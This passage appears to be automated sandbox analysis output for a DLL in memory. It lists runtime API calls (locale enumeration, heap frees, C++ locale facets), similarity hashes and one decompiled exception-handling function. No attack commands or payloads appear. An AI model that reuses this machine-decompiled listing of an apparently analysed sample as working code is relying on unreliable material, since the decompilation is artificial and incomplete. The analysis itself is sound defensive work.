                                                                                                                          • EnumSystemLocalesW.KERNEL32(6E33E726,00000001,00000000,?,-00000050,?,6E33EAC5,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 6E33E492
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2417226690-0
                                                                                                                          • Opcode ID: 9265bd3905a340f8883ef142d5f5bb3b531c0576627c0b2344579fc72bc615e0
                                                                                                                          • Instruction ID: 0ec0e9aa7223a3b2e2a2d96b092ada49a1f52b066d907094819bc50a9f87e86e
                                                                                                                          • Opcode Fuzzy Hash: 9265bd3905a340f8883ef142d5f5bb3b531c0576627c0b2344579fc72bc615e0
                                                                                                                          • Instruction Fuzzy Hash: 22F0F6362043545FD7245FFAD885EAABB95EF85378F25882DE9854B640D7B2AC01C710
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 6E31843F: RtlEnterCriticalSection.NTDLL(?), ref: 6E31844E
                                                                                                                          • EnumSystemLocalesW.KERNEL32(6E33041C,00000001,6E378410,0000000C,6E330CBD,00000000), ref: 6E330461
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1272433827-0
                                                                                                                          • Opcode ID: 455c1af81d71bc35303ce67f8b051f8da3c5bed67a884d50369718437d3ab87e
                                                                                                                          • Instruction ID: a258dea9d2a3856f7e3b4052c6d446fd5c2affea9a8891773ac6f4c7f66784e9
                                                                                                                          • Opcode Fuzzy Hash: 455c1af81d71bc35303ce67f8b051f8da3c5bed67a884d50369718437d3ab87e
                                                                                                                          • Instruction Fuzzy Hash: 88F03776A04614DFDB14EFE8E802BAC77F4EB45329F20856AE4109B290DB758901CF40
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 6E32F299: GetLastError.KERNEL32(00000000,00000000,?,6E327CF9,?,?,00000003,?,6E2F1083,6E2F10F4,?,6E2F0EE0,00000000,00000000,00000000,00000004), ref: 6E32F29E
                                                                                                                            • Part of subcall function 6E32F299: SetLastError.KERNEL32(00000000,6E37A1A0,000000FF,?,6E327CF9,?,?,00000003,?,6E2F1083,6E2F10F4,?,6E2F0EE0,00000000,00000000,00000000), ref: 6E32F33C
                                                                                                                          • EnumSystemLocalesW.KERNEL32(6E33E29D,00000001,00000000,?,?,6E33EB23,-00000050,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 6E33E37B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2417226690-0
                                                                                                                          • Opcode ID: 5113a00c007a502286bb5763d62fbd06eb0fcba42c23a79ca8bb49074031446b
                                                                                                                          • Instruction ID: b55a06f0375482be62a57935a9c3b14b4da4321a3c9e7769ddcb46900894e038
                                                                                                                          • Opcode Fuzzy Hash: 5113a00c007a502286bb5763d62fbd06eb0fcba42c23a79ca8bb49074031446b
                                                                                                                          • Instruction Fuzzy Hash: A3F0553A30034597CB04AFB6C848A6ABFA4EFC2325F2A4059EA258B240C6329842C790
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,6E3333BC,?,20001004,00000000,00000002,?,?,6E33271D), ref: 6E330E80
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: InfoLocale
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2299586839-0
                                                                                                                          • Opcode ID: 90ab07b7ba0c57fadd014146bc356914af6d9f79a2b0d5d2e36ad077c535b9d4
                                                                                                                          • Instruction ID: b6ba0a480b527b1988d452962f9d589997338f7d072ec30b88207aea29ae7a18
                                                                                                                          • Opcode Fuzzy Hash: 90ab07b7ba0c57fadd014146bc356914af6d9f79a2b0d5d2e36ad077c535b9d4
                                                                                                                          • Instruction Fuzzy Hash: 06E04F325009A8FBCF122FA1DC04EDE3E1DEF85B61F204411FC1565154DB728921EAD4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,00000008,?,00000000,?,?,6E30981B,?,00000022,00000000,00000002,?,?,6E306C7B,00000000,?), ref: 6E309EE2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: InfoLocale
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2299586839-0
                                                                                                                          • Opcode ID: 121fb5e373271debe9f6695319b843930dd100d3de6cebf52d8a473b0ab9483f
                                                                                                                          • Instruction ID: 5a75c93548ccc40da76c7e495801efcbcfa07f45a792a316bbcc697ea3c30f17
                                                                                                                          • Opcode Fuzzy Hash: 121fb5e373271debe9f6695319b843930dd100d3de6cebf52d8a473b0ab9483f
                                                                                                                          • Instruction Fuzzy Hash: C3E08C32500A29EB8F026FD1E8088EE3F2DEF8A7217058404F9080A114CB329C20DBE0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateHeap
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1279760036-0
                                                                                                                          • Opcode ID: a043ccc47e3fde7a2226f1987a1f6f30a92165c30642a1e99a24607af7041dd9
                                                                                                                          • Instruction ID: a460a7dc98967edde2c54f8d7cf213b65224a25777feb9b1af5d8ceb89066a18
                                                                                                                          • Opcode Fuzzy Hash: a043ccc47e3fde7a2226f1987a1f6f30a92165c30642a1e99a24607af7041dd9
                                                                                                                          • Instruction Fuzzy Hash: 2532AE34A1020A9FCB14CF98C990AEEBBB5EF45304F254579DDC5A7319D732AA46CB90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 1ae250e2fa9cb032ab4decf3eb4112c102881edd031f61f0994919ae6be86db0
                                                                                                                          • Instruction ID: 6520f51d38de372135c2b15391c6864ba5045bea9b0517e1cfe1dbe2ac67a814
                                                                                                                          • Opcode Fuzzy Hash: 1ae250e2fa9cb032ab4decf3eb4112c102881edd031f61f0994919ae6be86db0
                                                                                                                          • Instruction Fuzzy Hash: 9D518171E04219EFDF08CF99C990AEEBBB6EF88314F19805DE805AB305C7359A51CB90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 71%
                                                                                                                          			E6E2D21B4(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                                                                                                                          				intOrPtr _v8;
                                                                                                                          				char _v12;
                                                                                                                          				void* __ebp;
                                                                                                                          				signed int* _t43;
                                                                                                                          				char _t44;
                                                                                                                          				void* _t46;
                                                                                                                          				void* _t49;
                                                                                                                          				intOrPtr* _t53;
                                                                                                                          				void* _t54;
                                                                                                                          				void* _t65;
                                                                                                                          				long _t66;
                                                                                                                          				signed int* _t80;
                                                                                                                          				signed int* _t82;
                                                                                                                          				void* _t84;
                                                                                                                          				signed int _t86;
                                                                                                                          				void* _t89;
                                                                                                                          				void* _t95;
                                                                                                                          				void* _t96;
                                                                                                                          				void* _t99;
                                                                                                                          				void* _t106;
                                                                                                                          
                                                                                                                          				_t43 = _t84;
                                                                                                                          				_t65 = __ebx + 2;
                                                                                                                          				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                                                                                                                          				_t89 = _t95;
                                                                                                                          				_t96 = _t95 - 8;
                                                                                                                          				_push(_t65);
                                                                                                                          				_push(_t84);
                                                                                                                          				_push(_t89);
                                                                                                                          				asm("cld");
                                                                                                                          				_t66 = _a8;
                                                                                                                          				_t44 = _a4;
                                                                                                                          				if(( *(_t44 + 4) & 0x00000006) != 0) {
                                                                                                                          					_push(_t89);
                                                                                                                          					E6E2D231B(_t66 + 0x10, _t66, 0xffffffff);
                                                                                                                          					_t46 = 1;
                                                                                                                          				} else {
                                                                                                                          					_v12 = _t44;
                                                                                                                          					_v8 = _a12;
                                                                                                                          					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                                                                                                                          					_t86 =  *(_t66 + 0xc);
                                                                                                                          					_t80 =  *(_t66 + 8);
                                                                                                                          					_t49 = E6E2D23D5(_t66);
                                                                                                                          					_t99 = _t96 + 4;
                                                                                                                          					if(_t49 == 0) {
                                                                                                                          						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                                                                                                          						goto L11;
                                                                                                                          					} else {
                                                                                                                          						while(_t86 != 0xffffffff) {
                                                                                                                          							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                                                                                                                          							if(_t53 == 0) {
                                                                                                                          								L8:
                                                                                                                          								_t80 =  *(_t66 + 8);
                                                                                                                          								_t86 = _t80[_t86 + _t86 * 2];
                                                                                                                          								continue;
                                                                                                                          							} else {
                                                                                                                          								_t54 =  *_t53();
                                                                                                                          								_t89 = _t89;
                                                                                                                          								_t86 = _t86;
                                                                                                                          								_t66 = _a8;
                                                                                                                          								_t55 = _t54;
                                                                                                                          								_t106 = _t54;
                                                                                                                          								if(_t106 == 0) {
                                                                                                                          									goto L8;
                                                                                                                          								} else {
                                                                                                                          									if(_t106 < 0) {
                                                                                                                          										_t46 = 0;
                                                                                                                          									} else {
                                                                                                                          										_t82 =  *(_t66 + 8);
                                                                                                                          										E6E2D22C0(_t55, _t66);
                                                                                                                          										_t89 = _t66 + 0x10;
                                                                                                                          										E6E2D231B(_t89, _t66, 0);
                                                                                                                          										_t99 = _t99 + 0xc;
                                                                                                                          										E6E2D23B7(_t82[2], 1);
                                                                                                                          										 *(_t66 + 0xc) =  *_t82;
                                                                                                                          										_t66 = 0;
                                                                                                                          										_t86 = 0;
                                                                                                                          										 *(_t82[2])();
                                                                                                                          										goto L8;
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          							goto L13;
                                                                                                                          						}
                                                                                                                          						L11:
                                                                                                                          						_t46 = 1;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				L13:
                                                                                                                          				return _t46;
                                                                                                                          			}























                                                                                                                          0x6e2d221b
                                                                                                                          0x6e2d221d
                                                                                                                          0x6e2d221e
                                                                                                                          0x6e2d221f
                                                                                                                          0x6e2d2222
                                                                                                                          0x6e2d2222
                                                                                                                          0x6e2d2224
                                                                                                                          0x00000000
                                                                                                                          0x6e2d2226
                                                                                                                          0x6e2d2226
                                                                                                                          0x6e2d2270
                                                                                                                          0x6e2d2228
                                                                                                                          0x6e2d2228
                                                                                                                          0x6e2d222c
                                                                                                                          0x6e2d2234
                                                                                                                          0x6e2d2239
                                                                                                                          0x6e2d223e
                                                                                                                          0x6e2d224a
                                                                                                                          0x6e2d2252
                                                                                                                          0x6e2d2259
                                                                                                                          0x6e2d225f
                                                                                                                          0x6e2d2263
                                                                                                                          0x00000000
                                                                                                                          0x6e2d2263
                                                                                                                          0x6e2d2226
                                                                                                                          0x6e2d2224
                                                                                                                          0x00000000
                                                                                                                          0x6e2d220a
                                                                                                                          0x6e2d227e
                                                                                                                          0x6e2d227e
                                                                                                                          0x6e2d227e
                                                                                                                          0x6e2d21fa
                                                                                                                          0x6e2d229a
                                                                                                                          0x6e2d22a1

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186146468.000000006E2D1000.00000020.00020000.sdmp, Offset: 6E2D0000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1186122026.000000006E2D0000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.1186170989.000000006E2D3000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.1186191044.000000006E2D5000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.1186206553.000000006E2D6000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                                                                                                          • Instruction ID: 438c0cc961863879b6bfbc07876b5b80b6104fce4f12502c5492238cf87deb83
                                                                                                                          • Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                                                                                                          • Instruction Fuzzy Hash: CF21CB779042099FDB00DFA8DCC49A7B7A6FF49350B058558EE159B245D730F919C7E0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                          • Instruction ID: a613bba58fce6bf5bccd438c52f453ab185144769cbbccf8d4baac35bc1f8da5
                                                                                                                          • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                          • Instruction Fuzzy Hash: AF113D7B341383C7EEC085FFC4B46B7F396EBC622576943BAD0618B658D12BE1459600
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186488728.000000006E37D000.00000040.00020000.sdmp, Offset: 6E37D000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
                                                                                                                          • Instruction ID: 78deb6dc453546c1b3fae316f8ad1afebc6e25a6784d8bd989e8ce46f14326e0
                                                                                                                          • Opcode Fuzzy Hash: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
                                                                                                                          • Instruction Fuzzy Hash: 4711D6733401019FDB54CE99DCD0E9677DAEB892307558065DD04CB315D67AE801CB60
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186488728.000000006E37D000.00000040.00020000.sdmp, Offset: 6E37D000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: d6db8e1f961792d163c78665be140d0242f94593fd5b6291162898feff87c4c3
                                                                                                                          • Instruction ID: 4e96736f374ce85b0d1b276ed4a23fdfe004789e4ce1c4c062bb244c8e95d778
                                                                                                                          • Opcode Fuzzy Hash: d6db8e1f961792d163c78665be140d0242f94593fd5b6291162898feff87c4c3
                                                                                                                          • Instruction Fuzzy Hash: 4E0126323042418FDB69CF69D994D69B7E8EBD3364B95C07EC44687A19D239E441CD24
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 7fd1dc8cc4201bab0dfbcad80c1a42e0146a61ef2c67b76f7307b9c56e3daa6f
                                                                                                                          • Instruction ID: f22e2e59bca7df0487a4e14f4ea22f9997545151e47da55e9e487a5e11d8b7df
                                                                                                                          • Opcode Fuzzy Hash: 7fd1dc8cc4201bab0dfbcad80c1a42e0146a61ef2c67b76f7307b9c56e3daa6f
                                                                                                                          • Instruction Fuzzy Hash: D4E08C32911278EBCB14CBC8C940D9AB3ECEB44B55B254896B511D3180D270DE00CBD0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E306CB6
                                                                                                                          • collate.LIBCPMT ref: 6E306CBF
                                                                                                                            • Part of subcall function 6E3059D8: __EH_prolog3_GS.LIBCMT ref: 6E3059DF
                                                                                                                            • Part of subcall function 6E3059D8: __Getcoll.LIBCPMT ref: 6E305A43
                                                                                                                            • Part of subcall function 6E3059D8: std::_Locinfo::~_Locinfo.LIBCPMT ref: 6E305A5F
                                                                                                                          • __Getcoll.LIBCPMT ref: 6E306D05
                                                                                                                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E306D19
                                                                                                                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E306D2E
                                                                                                                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E306D7F
                                                                                                                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E306EB4
                                                                                                                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E306EC7
                                                                                                                          • int.LIBCPMT ref: 6E306ED4
                                                                                                                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E306EE4
                                                                                                                          • int.LIBCPMT ref: 6E306EF1
                                                                                                                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E306F01
                                                                                                                          • int.LIBCPMT ref: 6E306F0E
                                                                                                                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E306F1E
                                                                                                                          • int.LIBCPMT ref: 6E306CDF
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • int.LIBCPMT ref: 6E306D42
                                                                                                                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E306D6C
                                                                                                                          • int.LIBCPMT ref: 6E306D97
                                                                                                                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E306DC5
                                                                                                                          • int.LIBCPMT ref: 6E306DD2
                                                                                                                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E306DF9
                                                                                                                          • int.LIBCPMT ref: 6E306E06
                                                                                                                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E306E56
                                                                                                                          • int.LIBCPMT ref: 6E306E63
                                                                                                                          • int.LIBCPMT ref: 6E306F36
                                                                                                                          • numpunct.LIBCPMT ref: 6E306F5D
                                                                                                                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E306F6D
                                                                                                                          • int.LIBCPMT ref: 6E306F7A
                                                                                                                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E306FB1
                                                                                                                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E306FC4
                                                                                                                          • int.LIBCPMT ref: 6E306FD1
                                                                                                                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E306FE1
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: AddfacLocimp::_Locimp_std::locale::_$std::_$GetcollLockit$H_prolog3H_prolog3_LocinfoLocinfo::~_Lockit::_Lockit::~_collatenumpunct
                                                                                                                          • String ID: 8=An$<=An$@=An$D=An$D=An$H=An$H=An$L=An$L=An$P=An$T=An$T=An
                                                                                                                          • API String ID: 2009638416-1366981069
                                                                                                                          • Opcode ID: 68a267592dcc7161e0af48a73dc9e59024d0fa4568c9996fda4162abbeb6e472
                                                                                                                          • Instruction ID: 22c100071f38c969e5c3fd6360353a9a77e72891a3ceea694c84d21490914707
                                                                                                                          • Opcode Fuzzy Hash: 68a267592dcc7161e0af48a73dc9e59024d0fa4568c9996fda4162abbeb6e472
                                                                                                                          • Instruction Fuzzy Hash: C791F6B1D04319AFEB215FF5CC54BBFBAADAF52754F00481DE844AB280EB758941C7A2
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • ___free_lconv_mon.LIBCMT ref: 6E33B2E8
                                                                                                                            • Part of subcall function 6E33C9F8: _free.LIBCMT ref: 6E33CA15
                                                                                                                            • Part of subcall function 6E33C9F8: _free.LIBCMT ref: 6E33CA27
                                                                                                                            • Part of subcall function 6E33C9F8: _free.LIBCMT ref: 6E33CA39
                                                                                                                            • Part of subcall function 6E33C9F8: _free.LIBCMT ref: 6E33CA4B
                                                                                                                            • Part of subcall function 6E33C9F8: _free.LIBCMT ref: 6E33CA5D
                                                                                                                            • Part of subcall function 6E33C9F8: _free.LIBCMT ref: 6E33CA6F
                                                                                                                            • Part of subcall function 6E33C9F8: _free.LIBCMT ref: 6E33CA81
                                                                                                                            • Part of subcall function 6E33C9F8: _free.LIBCMT ref: 6E33CA93
                                                                                                                            • Part of subcall function 6E33C9F8: _free.LIBCMT ref: 6E33CAA5
                                                                                                                            • Part of subcall function 6E33C9F8: _free.LIBCMT ref: 6E33CAB7
                                                                                                                            • Part of subcall function 6E33C9F8: _free.LIBCMT ref: 6E33CAC9
                                                                                                                            • Part of subcall function 6E33C9F8: _free.LIBCMT ref: 6E33CADB
                                                                                                                            • Part of subcall function 6E33C9F8: _free.LIBCMT ref: 6E33CAED
                                                                                                                          • _free.LIBCMT ref: 6E33B2DD
                                                                                                                            • Part of subcall function 6E331434: HeapFree.KERNEL32(00000000,00000000,?,6E33D1C0,?,00000000,?,?,?,6E33D4C4,?,00000007,?,?,6E33B43B,?), ref: 6E33144A
                                                                                                                            • Part of subcall function 6E331434: GetLastError.KERNEL32(?,?,6E33D1C0,?,00000000,?,?,?,6E33D4C4,?,00000007,?,?,6E33B43B,?,?), ref: 6E33145C
                                                                                                                          • _free.LIBCMT ref: 6E33B2FF
                                                                                                                          • _free.LIBCMT ref: 6E33B314
                                                                                                                          • _free.LIBCMT ref: 6E33B31F
                                                                                                                          • _free.LIBCMT ref: 6E33B341
                                                                                                                          • _free.LIBCMT ref: 6E33B354
                                                                                                                          • _free.LIBCMT ref: 6E33B362
                                                                                                                          • _free.LIBCMT ref: 6E33B36D
                                                                                                                          • _free.LIBCMT ref: 6E33B3A5
                                                                                                                          • _free.LIBCMT ref: 6E33B3AC
                                                                                                                          • _free.LIBCMT ref: 6E33B3C9
                                                                                                                          • _free.LIBCMT ref: 6E33B3E1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 161543041-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E305688
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E305692
                                                                                                                          • int.LIBCPMT ref: 6E3056A9
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E3056E3
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E305703
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E305710
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E30571D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                          • String ID: T=An
                                                                                                                          • API String ID: 3920336645-183501617
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F7DA6
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F7DB0
                                                                                                                          • int.LIBCPMT ref: 6E2F7DC7
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F7E01
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F7E21
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F7E2E
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F7E3B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                          • String ID: x<An
                                                                                                                          • API String ID: 3920336645-3788929408
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E3054C9
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E3054D3
                                                                                                                          • int.LIBCPMT ref: 6E3054EA
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • moneypunct.LIBCPMT ref: 6E30550D
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E305524
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E305544
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E305551
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                          • String ID: L=An
                                                                                                                          • API String ID: 3376033448-2673704001
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E30555E
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E305568
                                                                                                                          • int.LIBCPMT ref: 6E30557F
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • moneypunct.LIBCPMT ref: 6E3055A2
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E3055B9
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E3055D9
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E3055E6
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                          • String ID: H=An
                                                                                                                          • API String ID: 3376033448-272624406
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E305275
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E30527F
                                                                                                                          • int.LIBCPMT ref: 6E305296
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
